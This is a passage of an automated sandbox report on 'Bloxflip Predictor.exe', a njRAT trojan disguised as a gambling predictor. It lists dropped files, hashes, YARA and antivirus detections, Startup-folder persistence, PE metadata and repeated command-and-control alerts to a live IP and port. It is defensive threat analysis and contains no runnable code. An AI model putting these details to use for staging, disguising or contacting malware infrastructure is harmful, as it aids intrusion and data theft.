                                          Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):525
                                          Entropy (8bit):5.259753436570609
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                          MD5:260E01CC001F9C4643CA7A62F395D747
                                          SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                          SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                          SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                          Process:C:\Windows\Bloxflip Predictor.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):28160
                                          Entropy (8bit):5.537645975163793
                                          Encrypted:false
                                          SSDEEP:384:rLptwff1tqGIOfIBTkqS61bPGdrNM1AQk93vmhm7UMKmIEecKdbXTzm9bVhcar6v:/pqffy3LN1A/vMHTi9bD
                                          MD5:7BF897CA59B77AD3069C07149C35F97E
                                          SHA1:6951DC20FA1E550EC9D066FE20E5100A9946A56B
                                          SHA-256:BC37B896FEE26A5B4DE7845CDD046E0200C783D4907FFA7E16DA84ED6B5987DD
                                          SHA-512:6E0725043262EEC328130883B8C6A413C03FA11E766DB44E6E2595DFA5D3E13D02B7A199105CAD8439C66238CF2975099D40B33CDAEB4768DA159060B6F35DAF
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: unknown
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: Florian Roth
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_attrib, Description: Detects executables using attrib with suspicious attributes attributes, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 84%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.mc.................f............... ........@.. ....................................@....................................W.......@............................................................................ ............... ..H............text...4d... ...f.................. ..`.rsrc...@............h..............@..@.reloc...............l..............@..B........................H........P...3............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0............(....(....*....0...........(....*..0...............(....*..0...........(....*..0................-.(...+*.*.0.........................*..(....*.0..........~.........-.(...+.....~....*..(....*.0..........r...p.....r...p.....r-..p.....r...p.
                                          Process:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                          Category:dropped
                                          Size (bytes):1238
                                          Entropy (8bit):2.9005324467960167
                                          Encrypted:false
                                          SSDEEP:24:8gvWLgD4/BOmRC87q8MHBJrXE+16d0+qy:8pgDsvRC87tMhJrRhy
                                          MD5:A1D982C1F47A41AE13C580A79166C9A8
                                          SHA1:D208B7CCB1761D32579350BA827F1C677E65A765
                                          SHA-256:2881695075D4DCE03AF905B41122BDB3DFEB95EDA6404F53BF035E943818064D
                                          SHA-512:5F0F455C1472AAC57DC2192702EFB1752A21A2695F0F230281671F6EDBA8025C8B0AB098F8292E374468B770F2FB1BB2D923FE5CCEF12CE9B427C60F7840DA09
                                          Malicious:false
                                          Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.....Z.1...........Programs..B............................................P.r.o.g.r.a.m.s.....V.1...........Startup.@............................................S.t.a.r.t.u.p.....b.2...........Windows.exe.H............................................W.i.n.d.o.w.s...e.x
                                          Process:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                          Category:dropped
                                          Size (bytes):1058
                                          Entropy (8bit):2.9364199742996298
                                          Encrypted:false
                                          SSDEEP:12:8gl0csXU1e/tz0/CSLwrHj4/3BVwzyDilVBJrXE+1gCNfBf4t2YZ/elFlSJm:87vWLgD4/BUBJrXE+1pjqy
                                          MD5:927D6613C523813127CF1E54134796A7
                                          SHA1:FF7DB76489FE1177019DD219C1EA466BE3462970
                                          SHA-256:BB3CCDA0AAC133870D311CB526B924177ABBA4179D1FD30C0A29D991CBD14DFC
                                          SHA-512:6A2E3839F16E46D8B5DCB95C5782A7DC6FCC3895FDCEFA8D42902F1F736F31C34AE31EA1CA77DD067E323B4263CCEAD9CF44D3864FF0E08BB22606228022858C
                                          Malicious:false
                                          Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........Templates.D............................................T.e.m.p.l.a.t.e.s.....b.2...........Windows.exe.H............................................W.i.n.d.o.w.s...e.x.e...........\.W.i.n.d.o.w.s...e.x.e.............}.............>.e.L.:..er.=}...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.
                                          Process:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):28160
                                          Entropy (8bit):5.537645975163793
                                          Encrypted:false
                                          SSDEEP:384:rLptwff1tqGIOfIBTkqS61bPGdrNM1AQk93vmhm7UMKmIEecKdbXTzm9bVhcar6v:/pqffy3LN1A/vMHTi9bD
                                          MD5:7BF897CA59B77AD3069C07149C35F97E
                                          SHA1:6951DC20FA1E550EC9D066FE20E5100A9946A56B
                                          SHA-256:BC37B896FEE26A5B4DE7845CDD046E0200C783D4907FFA7E16DA84ED6B5987DD
                                          SHA-512:6E0725043262EEC328130883B8C6A413C03FA11E766DB44E6E2595DFA5D3E13D02B7A199105CAD8439C66238CF2975099D40B33CDAEB4768DA159060B6F35DAF
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Windows\Bloxflip Predictor.exe, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Windows\Bloxflip Predictor.exe, Author: unknown
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Windows\Bloxflip Predictor.exe, Author: Florian Roth
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Windows\Bloxflip Predictor.exe, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_attrib, Description: Detects executables using attrib with suspicious attributes attributes, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 84%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.mc.................f............... ........@.. ....................................@....................................W.......@............................................................................ ............... ..H............text...4d... ...f.................. ..`.rsrc...@............h..............@..@.reloc...............l..............@..B........................H........P...3............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0............(....(....*....0...........(....*..0...............(....*..0...........(....*..0................-.(...+*.*.0.........................*..(....*.0..........~.........-.(...+.....~....*..(....*.0..........r...p.....r...p.....r-..p.....r...p.
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):5.537645975163793
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Bloxflip Predictor.exe
                                          File size:28'160 bytes
                                          MD5:7bf897ca59b77ad3069c07149c35f97e
                                          SHA1:6951dc20fa1e550ec9d066fe20e5100a9946a56b
                                          SHA256:bc37b896fee26a5b4de7845cdd046e0200c783d4907ffa7e16da84ed6b5987dd
                                          SHA512:6e0725043262eec328130883b8c6a413c03fa11e766db44e6e2595dfa5d3e13d02b7a199105cad8439c66238cf2975099d40b33cdaeb4768da159060b6f35daf
                                          SSDEEP:384:rLptwff1tqGIOfIBTkqS61bPGdrNM1AQk93vmhm7UMKmIEecKdbXTzm9bVhcar6v:/pqffy3LN1A/vMHTi9bD
                                          TLSH:09C2F82C37B68232D1EF467E4662EA5142B5D44BF223FB0E4CD958D94B1B78A0A41FE4
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.mc.................f............... ........@.. ....................................@................................
                                          Icon Hash:00928e8e8686b000
                                          Entrypoint:0x40842e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x636DAC2A [Fri Nov 11 01:58:02 2022 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x83d40x57.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x240.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x64340x6600b43ce1e9ab64a13e9f40b7497d9c743fFalse0.4690946691176471data5.580560397703258IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xa0000x2400x4005b346ed223699f15252c1fdad182859fFalse0.3134765625data4.968771659524424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xc0000xc0x2001073501db1737ec78fc9e639b9e87dacFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_MANIFEST0xa0580x1e7XML 1.0 document, ASCII text, with CRLF line terminators0.5338809034907598
                                          DLLImport
                                          mscoree.dll_CorExeMain
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-12-13T12:31:56.140063+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549726147.185.221.22410397TCP
                                          2024-12-13T12:31:56.140063+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549726147.185.221.22410397TCP
                                          2024-12-13T12:31:56.262752+01002825563ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf)1192.168.2.549726147.185.221.22410397TCP
                                          2024-12-13T12:31:56.262752+01002838486ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf)1192.168.2.549726147.185.221.22410397TCP
                                          2024-12-13T12:32:02.247114+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549726147.185.221.22410397TCP
                                          2024-12-13T12:32:20.152010+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549777147.185.221.22410397TCP
                                          2024-12-13T12:32:20.152010+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549777147.185.221.22410397TCP
                                          2024-12-13T12:32:20.271819+01002825563ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf)1192.168.2.549777147.185.221.22410397TCP
                                          2024-12-13T12:32:20.271819+01002838486ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf)1192.168.2.549777147.185.221.22410397TCP
                                          2024-12-13T12:32:26.450354+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549777147.185.221.22410397TCP
                                          2024-12-13T12:32:37.200493+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549777147.185.221.22410397TCP
                                          2024-12-13T12:32:40.763598+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549777147.185.221.22410397TCP
                                          2024-12-13T12:32:44.355246+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:44.355246+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:44.474994+01002825563ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:44.474994+01002838486ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:45.653488+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:50.932266+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:51.418885+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:52.965912+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:53.091103+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:54.168890+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:54.288700+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:55.988155+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:56.110068+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:56.235673+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:32:56.355511+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:33:03.308156+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549830147.185.221.22410397TCP
                                          2024-12-13T12:33:08.403871+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:08.403871+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:16.217269+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:16.338822+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:16.578859+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:19.122933+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:21.608423+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:24.330608+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:24.577585+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:27.309473+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:30.017959+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:30.272172+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549887147.185.221.22410397TCP
                                          2024-12-13T12:33:32.449667+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549941147.185.221.22410397TCP
                                          2024-12-13T12:33:32.449667+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549941147.185.221.22410397TCP
                                          2024-12-13T12:33:33.238258+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549941147.185.221.22410397TCP
                                          2024-12-13T12:33:41.737850+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549941147.185.221.22410397TCP
                                          2024-12-13T12:33:41.989544+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549941147.185.221.22410397TCP
                                          2024-12-13T12:33:44.583171+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549941147.185.221.22410397TCP
                                          2024-12-13T12:33:51.645412+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549941147.185.221.22410397TCP
                                          2024-12-13T12:33:56.481063+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549981147.185.221.22410397TCP
                                          2024-12-13T12:33:56.481063+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549981147.185.221.22410397TCP
                                          2024-12-13T12:33:56.841092+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549981147.185.221.22410397TCP
                                          2024-12-13T12:33:59.273170+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549981147.185.221.22410397TCP
                                          2024-12-13T12:34:01.452339+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549981147.185.221.22410397TCP
                                          2024-12-13T12:34:01.812833+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549981147.185.221.22410397TCP
                                          2024-12-13T12:34:01.983927+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549981147.185.221.22410397TCP
                                          2024-12-13T12:34:08.965686+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549981147.185.221.22410397TCP
                                          2024-12-13T12:34:20.522843+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549982147.185.221.22410397TCP
                                          2024-12-13T12:34:20.522843+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549982147.185.221.22410397TCP
                                          2024-12-13T12:34:22.304772+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549982147.185.221.22410397TCP
                                          2024-12-13T12:34:29.053118+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549982147.185.221.22410397TCP
                                          2024-12-13T12:34:29.173141+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549982147.185.221.22410397TCP
                                          2024-12-13T12:34:36.705475+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549982147.185.221.22410397TCP
                                          2024-12-13T12:34:39.761643+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549982147.185.221.22410397TCP
                                          2024-12-13T12:34:44.546142+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:44.546142+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:45.305350+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:48.003814+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:48.223165+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:48.366920+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:50.543528+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:51.281406+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:53.695251+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:34:53.815105+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
